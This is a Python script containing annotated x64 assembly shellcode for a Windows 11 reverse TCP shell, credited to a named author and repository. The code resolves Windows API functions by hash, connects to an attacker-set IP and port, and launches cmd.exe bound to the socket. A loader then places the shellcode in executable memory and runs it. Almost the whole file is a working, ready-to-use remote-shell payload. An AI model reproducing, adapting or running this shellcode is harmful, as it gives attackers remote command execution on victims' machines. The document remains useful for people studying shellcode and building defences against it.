#!/usr/bin/python
#
# Description: Windows 11 x64 Reverse TCP Shell
# Architecture: x64
# OS: Microsoft Windows
# Author: hvictor (Victor Huerlimann)
# Shellcode Size: 564 bytes
# Repository:https://github.com/hvictor/shellcode-x64
#
# Special thanks to wetw0rk (Milton Valencia), from whom I drew inspiration for the indicated parts of the code: https://github.com/wetw0rk/Sickle
#
# Note: You will have to modify the line 193 of this file according to the attacker's IP and port:
# mov r9, 0x7901A8C029230002 # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2]
# The high DWORD is the IPv4 address in little-endian, followed by the 2-bytes port in little-endian, and the 2-bytes address family.
import ctypes, struct
from ctypes import wintypes
from keystone import *
CODE = (
'''
start:
mov rbp, rsp
sub rsp, 1600
resolve_kernel32:
mov dl, 0x4b # dl = 'K'
mov rcx, 0x60 #
mov r8, gs:[rcx] # R8 = address of PEB
mov rdi, [r8 + 0x18] # RDI = address of _PEB_LDR_DATA
mov rdi, [rdi + 0x30] # RDI = address of InInitializationOrderModuleList (first _LIST_ENTRY)
search:
xor rcx, rcx
mov rbx, [rdi + 0x10] # RBX = DllBase
mov rsi, [rdi + 0x40] # RSI = address of UNICODE string BaseDllName.Buffer
mov rdi, [rdi] # RDI = address of the next _LIST_ENTRY
cmp [rsi + 0x18], cx # Compare the 24-th UNICODE char with NULL
jne search # If length of BaseDllName is not 12 UNICODE chars, continue searching
cmp [rsi], dl # Compare the first UNICODE char with 'K'
jne search # If the first UNICODE char is not 'K', continue searching
find_function_jmp:
jmp callback # Jump to callback to make a negative (null byte free) call to get_find_function_addr
get_find_function_addr:
pop rsi # The address of find_function is popped in RSI
mov [rbp + 0x8], rsi # The address of find_function is stored at (RBP + 8)
jmp resolve_k32_sym # Once the address of find_function has been stored, proceed with the resolution of kernel32 symbols
callback:
call get_find_function_addr # When this call is done, the address of the 1st instruction find_function (add rsp, 8) is pushed to the stack
# This is the address of find_function, and it will be popped in ESI (see get_find_function_addr).
find_function:
# Current Stack Layout:
#---------------------------------------------------------------------------
# QWORD: Return Address (addr of instruction after "call find_function", see below)
# QWORD: Number of hash bytes + 8 <- RSP
# QWORD: <0x00000000> <Hash of CreateProcessA (4 bytes)>
# QWORD: <0x00000000> <Hash of LoadLibraryA (4 bytes)>
# ...
# QWORD: 0x0000000000000000
#---------------------------------------------------------------------------
add rsp, 8 # Point RSP to (Number of hash bytes + 8)
pop rax # RAX = Number of hash bytes + 8
push -1 # Write -1 on the stack instead of (Number of hash bytes + 8)
add rsp, rax # Add (Number of hash bytes + 8) to RSP: it now points to 0x0000000000000000
# Current Stack Layout:
#---------------------------------------------------------------------------
# QWORD: Return Address
# QWORD: 0xffffffffffffffff
# QWORD: <0x00000000> <Hash of CreateProcessA (4 bytes)>
# QWORD: <0x00000000> <Hash of LoadLibraryA (4 bytes)>
# ...
# QWORD: 0x0000000000000000 <- RSP
#---------------------------------------------------------------------------
find_function_loop2:
xor rax, rax
xor rdi, rdi
mov eax, [rbx + 0x3c] # EAX = offset to the PE Header of the module = e_lfanew
mov edi, [rbx + rax + 0x88] # EDI = RVA of the Export Directory Table of the module (1st field: VirtualAddress)
add rdi, rbx # RDI = VMA of the Export Directory Table of the module
mov ecx, [rdi + 24] # ECX = NumberOfNames (field of the Export Directory Table of the module)
mov eax, [rdi + 32] # EAX = RVA of AddressOfNames (array of Name Addresses, field of the Export Directory Table)
add rax, rbx # EAX = VMA of AddressOfNames
mov [rbp - 8], rax # Save the VMA of AddressOfNames at (EBP - 8): this location is never touched for anything else
find_function_loop:
dec ecx # Initially, ECX = NumberOfNames: decrement to get the index of the last name
mov rax, [rbp - 8] # EAX = VMA of AddressOfNames
mov esi, [rax + rcx * 4] # ESI = RVA of the current Symbol Name
add rsi, rbx # RSI = VMA of the current Symbol Name
compute_hash:
xor rax, rax # EAX = 0
cdq # If the MSB of EAX = 1: EDX = 0x11111111
# If the MSB of EAX = 0: EDX = 0x00000000 -> fills EDX with the sign of EAX
# In this case, EDX = 0x00000000 because EAX = 0x00000000
compute_hash_repeat:
ror edx, 0xd # Right-shift EDX of 13 bits
add edx, eax # EDX += current EAX value
lodsb # Load the byte pointed by ESI into AL
test al, al # Test if the NULL terminator of the Symbol Name has been reached
jnz compute_hash_repeat # If the NULL terminator has been reached (ZF = 1), proceed to hash comparison
# Else, perform the next iteration of the hash-computation algorithm
# At this point, EDX contains the computed hash of the current symbol
find_function_compare:
cmp edx, [rsp - 8] # Compare the computed hash with the hash of the wanted symbol
jnz find_function_loop # If ZF = 0, the hash is different: proceed with the next name from AddressOfNames
# If ZF = 1, the hash is equal: symbol found: continue hereby
mov edx, [rdi + 36] # EDX = RVA of the AddressOfNameOrdinals array
add rdx, rbx # RDX = VMA of the AddressOfNameOrdinals array
mov cx, [rdx + 2 * rcx] # CX = Symbol's Ordinal (lower 16 bits of ECX)
mov edx, [rdi + 28] # EDX = RVA of the AddressOfFunctions array
add rdx, rbx # RDX = VMA of the AddressOfFunctions array
mov eax, [rdx + 4 * rcx] # EAX = AddressOfFunctions[ordinal] = RVA of the wanted symbol
add rax, rbx # EAX = VMA of the wanted symbol
push rax # Push the wanted symbol's VMA onto the stack:
# ATTENTION: The symbol's VMA overwrites its Hash on the stack!
mov rax, [rsp - 8]
cmp rax, -1 # If *(RSP - 8) is -1: ZF = 1: all wanted symbols have been resolved
jnz find_function_loop2 # Until all wanted symbols have been resolved, continue looping
find_function_finish: # When we get here, all wanted symbols have been resolved: their VMAs are on the stack
sub rsp, 16 # Point RSP to the Return Address of find_function
ret # Return
resolve_k32_sym:
mov rax, 0x00000000ec0e4e8e # Hash of LoadLibraryA
push rax
mov rax, 0x0000000016b3fe72 # Hash of CreateProcessA
push rax
mov rax, 0x0000000078b5b983 # Hash of TerminateProcess
push rax
mov rax, 32 # Push 32 onto the stack
push rax
call [rbp + 8] # Call to find_function (see find_function above)
load_ws2_32:
mov rax, 0x0000000000006C6C # 'll x00 x00 x00 x00 x00 x00' (reversed)
push rax
mov rax, 0x642E32335F327377 # 'ws2_32.d' (reversed)
push rax
mov rcx, rsp # Paramter 1 = address of "ws2_32.dll"
sub rsp, 40 # Create 40 bytes of room on the stack
call [rsp + 80] # Call LoadLibraryA
nop
resolve_ws2_sym:
mov rbx, rax # RBX = Base Address of ws2_32.dll
mov rax, 0x0000000060aaf9ec # Hash of connect
push rax
mov rax, 0x00000000adf509d9 # Hash of WSASocketA
push rax
mov rax, 0x000000003bfcedcb # Hash of WSAStartup
push rax
mov rax, 32
push rax # Push 32 (Number of Hashes pushed + 8)
call [rbp + 8] # Call find_function
sub rsp, 512
call_WSAStartup:
mov rcx, 0x202 # RCX = WinSock Version 2.2
lea rdx, [rsp + 800] # RDX = Address of output WSAData structure
call [rsp + 520] # Call WSAStartup
call_WSASocketA:
mov rcx, 2 # Parameter af = 2 (AF_INET)
mov rdx, 1 # Parameter type = 1
mov r8, 6 # Parameter protocol = 6 (TCP)
xor r9, r9 # Parameter lpProtocolInfo = 0
mov [rsp + 32], r9 # Parameter dwFlags = 0
mov [rsp + 40], r9 # Parameter g = 0
call [rsp + 528] # Call WSASocketA
call_connect:
mov rsi, rax # Save socket fd in RSI
mov rcx, rax # RCX = Parameter s = socket fd created with WSSocketA
mov r8, 16 # R8 = Parameter namelen = 16
# Preparation of the sockaddr_in structure on the stack:
# struct sockaddr_in {
# QWORD: [sin_addr (4 bytes) | sin_port (2 bytes) | sin_family (2 bytes)]
# QWORD: sin_zero = [00000000 00000000]
# }
mov r9, 0x7901A8C029230002 # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2]
lea rdx, [rsp + 800] # RDX = Parameter name = Address of struct sockaddr_in
mov [rdx], r9 # Write fields: sin_addr, sin_port, sin_family
xor r9, r9
mov [rdx + 8], r9 # Write field sin_zero
call [rsp + 536] # Call connect
# Thanks to wetw0rk (Milton Valencia) for his setup_STARTUPINFOA implementation:
# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py
create_STARTUPINFOA:
lea rdi, [rsp + 800]
add rdi, 0x300
mov rbx, rdi
xor eax, eax
mov ecx, 0x20
rep stosd # Zero-out 0x80 bytes
mov eax, 0x68 # EAX = sizeof(_STARTUPINFO) = 0x68
mov [rbx], eax # Field lpStartInfo.cb = sizeof(_STARTUPINFO)
mov eax, 0x100 # EAX = STARTF_USESTDHANDLES
mov [rbx + 0x3c], eax # Field lpStartupInfo.dwFlags = STARTF_USESTDHANDLES
mov [rbx + 0x50], rsi # Field lpStartupInfo.hStdInput = socket fd
mov [rbx + 0x58], rsi # Field lpStartupInfo.hStdOutput = socket fd
mov [rbx + 0x60], rsi # Field lpStartupInfo.hStdError = socket fd
# Thanks to wetw0rk (Milton Valencia) for his call_CreateProcessA implementation:
# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py
call_CreateProccessA:
xor rax, rax
xor rcx, rcx # Parameter lpApplicationName = 0
lea rdx, [rsp + 800] # Parameter lpCommandLine
add rdx, 0x180
mov eax, 0x646d63 # EAX = "cmd"
mov [rdx], rax # Write "cmd" in the lpCommandLine parameter
xor r8, r8 # Parameter lpProcessAttributes = 0
xor r9, r9 # Parameter lpThreadAttributes = 0
xor rax, rax
inc eax
mov [rsp + 0x20], rax # Parameter bInheritHandles = 1
dec eax
mov [rsp + 0x28], rax # Parameter dwCreationFlags = 0
mov [rsp + 0x30], rax # Parameter lpEnvironment = 0
mov [rsp + 0x38], rax # Parameter lpCurrentDirectory = 0
mov [rsp + 0x40], rbx # Parameter lpStartupInfo = address of _STARTUPINFO
add rbx, 0x68
mov [rsp + 0x48], rbx # Parameter lpProcessInformation = output address, right after _STARTUPINFO
call [rsp + 616]
call_TerminateProcess:
xor rcx, rcx
dec rcx # Parameter hProcess = -1 = this process
xor rdx, rdx # Parameter uExitCode = 0 (graceful termination)
int3
call [rsp + 608] # Call TerminateProcess
'''
)
# Initialize engine in 64-bit mode
ks = Ks(KS_ARCH_X86, KS_MODE_64)
encoding, count = ks.asm(CODE)
instructions = ""
for dec in encoding:
instructions += "\\x{0:02x}".format(int(dec)).rstrip("\n")
print("Opcodes = (\"" + instructions + "\")")
print(f"Size: {len(encoding)} bytes.")
# E
# Preparation of WSAStartup (not included in the shellcode)
# Define necessary structures and constants
class WSADATA(ctypes.Structure):
_fields_ = [
("wVersion", wintypes.WORD),
("wHighVersion", wintypes.WORD),
("szDescription", wintypes.CHAR * 257),
("szSystemStatus", wintypes.CHAR * 129),
("iMaxSockets", wintypes.UINT),
("iMaxUdpDg", wintypes.UINT),
("lpVendorInfo", ctypes.POINTER(ctypes.c_char))
]
# Load the Winsock library
ws2_32 = ctypes.windll.ws2_32
# Define the WSAStartup function prototype
# WSAStartup takes two arguments:
# 1. A WORD containing the version of Winsock requested (e.g., 0x0202 for Winsock 2.2)
# 2. A pointer to a WSADATA structure that receives the details of the Winsock implementation
ws2_32.WSAStartup.argtypes = [wintypes.WORD, ctypes.POINTER(WSADATA)]
ws2_32.WSAStartup.restype = wintypes.INT
def call_wsastartup():
# Request version 2.2 (0x0202)
version_requested = 0x0202
# Create an instance of WSADATA to hold the output
wsadata = WSADATA()
# Call WSAStartup
result = ws2_32.WSAStartup(version_requested, ctypes.byref(wsadata))
if result != 0:
raise RuntimeError(f"WSAStartup failed with error code {result}")
print(f"WSAStartup succeeded. Winsock version: {wsadata.wVersion >> 8}.{wsadata.wVersion & 0xFF}")
return wsadata
call_wsastartup()
sh = b""
for e in encoding:
sh += struct.pack("B", e)
shellcode = bytearray(sh)
# Alloco memoria eseguibile per lo shellcode
ptr = ctypes.windll.kernel32.VirtualAlloc(0x10000000,
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
# Metto lo shellcode nel buffer `buf`
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
# Copio lo shellcode nella memoria allocata
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
print("Shellcode: Short Reverse Shell")
print("Shellcode address = %s" % hex(ptr))
input("\n[?] Press Enter to execute the shellcode: ")
# Eseguo lo shellcode in un nuovo thread, su cui faccio la join
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))